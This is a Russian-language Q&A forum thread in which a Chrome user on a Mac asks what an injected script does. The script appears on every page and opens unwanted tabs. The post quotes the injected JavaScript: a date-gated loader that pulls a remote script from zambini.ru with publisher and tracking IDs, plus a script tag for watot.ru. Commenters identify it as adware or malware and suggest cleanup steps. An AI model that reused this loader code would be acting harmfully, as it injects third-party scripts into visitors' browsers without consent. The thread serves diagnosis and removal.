# Что выполняет этот код?

Tags: javascript

Уважаемые программисты, мой Хром, систематически, на любой странице, при клике на любую область, запускает скрипт, который открывает новую пустую страницу. Подскажите, пожалуйста, что он делает. Это зараза какая-то?

```
 var a = new Date;
if (4 == a.getMonth() && 2017 == a.getUTCFullYear() || 5 == a.getMonth() && 2017 == a.getUTCFullYear() || 6 == a.getMonth() && 2017 == a.getUTCFullYear())(function(b, f) {
        var c = b.getElementsByTagName("script")[0],
            d = b.createElement("script");
        if (c) var e = function() {
            c.parentNode.insertBefore(d, c)
        };
        else(c = b.getElementsByTagName("head")[0]) || b.getElementsByTagName("body")[0], c || b.getElementsByTagName("html")[0], e = function() {
            c.appendChild(d)
        };
        d.type = "text/javascript";
        d.async = !0;
        d.src = "https://zambini.ru/gt2?b=eb6bc6b42fa0224312f656c5de3cdbb1&publisher_id=323584260a25ba14b5bd8cb5bb5201ea&uid=newage&newtest=1&bol=1&r=" + (new Date).getTime() +
            "&h=" + document.location.host;
        "[object Opera]" == f.opera ? b.addEventListener("DOMContentLoaded", e, !1) : e()
    })(document, window),
    function(b, f, c) {
        (f[c] = f[c] || []).push(function() {
            try {
                f.yaCounter44600758 = new Ya.Metrika({
                    id: 44600758,
                    clickmap: !0,
                    trackLinks: !0,
                    accurateTrackBounce: !0,
                    ut: "noindex"
                })
            } catch (g) {}
        });
        var d = b.getElementsByTagName("script")[0],
            e = b.createElement("script");
        d ? c = function() {
            d.parentNode.insertBefore(e, d)
        } : ((d = b.getElementsByTagName("head")[0]) || b.getElementsByTagName("body")[0], d || b.getElementsByTagName("html")[0],
            c = function() {
                d.appendChild(e)
            });
        e.type = "text/javascript";
        e.async = !0;
        e.src = "https://mc.yandex.ru/metrika/watch.js";
        "[object Opera]" == f.opera ? b.addEventListener("DOMContentLoaded", c, !1) : c()
    }(document, window, "yandex_metrika_callbacks");

<script type = "text/javascript" async = "" src = "https://watot.ru/0010?srv=5be683a0d44e343e39de372354fff938&session_id=0&defbr=0&publisher_id=323584260a25ba14b5bd8cb5bb5201ea&plugin_id=5555&gplugin_id=a3&instance_id=7777&bildid=eb6bc6b42fa0224312f656c5de3cdbb1&computer_id=543211819ed0b0d19696c0bb02dc132f&version=0&adult=false&adult_key=&referrer=https%3A%2F%2Fwww.google.ru%2F&domain=ru.stackoverflow.com&href=%2F&cat=182b56035898566301b2dce171e7c128&r=283563907"> </script>
```

Comment: Ну для начала http://jsbeautifier.org/

Comment: Если это вообще на каждом сайте, то скорее всего их пихает какое-то вредоносное расширение

Comment: Совершенно верно. Это повсюду. Как бы его найти и изничтожить? Касперский сообщает, что все у меня хорошо.
Правильно ли я предполагаю, что это встало в браузер типа плагина? Как можно установить источник, откуда зараза мне пропихивается?

Comment: Отключать/удалять расширения по очереди и смотреть, меняется ли ситуация

Comment: Все расширения отключил. Не помогло. Скрипт работает на любой странице, но не всегда. Несколько раз в час, натыкаюсь на явление, как-будто сверху появляется слой, который и есть этот скрипт - попытка нажатия любого поля, ведет к открытию новой вкладки по одному из трех адресов, один из которых https://watot.ru

Comment: если в другом браузере не такой проблемы - чисть браузер, куки, кэш, временные папки/данные. Если везде (хотя даже если только в хроме) - значит вирус. тоже проверяй на вирусы и чисть все кэши и временные папки. что ту еще сказать

Comment: еще можно попробовать запустить в приватном режиме или режиме инкогнито. Обычно в этом случае все дополнения отключены

Comment: забавно что условие стоит только на май, июнь, июль

Comment: Попробуйте утилиту HiJackThis для проверки реестра и выявления сомнительных записей проксирования, добавленных расширений и изменённых конфигураций.

Comment: Cпасибо, но это на Маке, а, значит, с реестром проблема.

Answer (score -1):

это **malware** у многих которые сталкиваются с данной проблемой ни один антивир не обнаруживает. есть спец проги которые удаляют их. главное при поиске и установке такой проге ни чего не подцепить.
Я лично **SpyHunter** пользовался два раза и два удачно.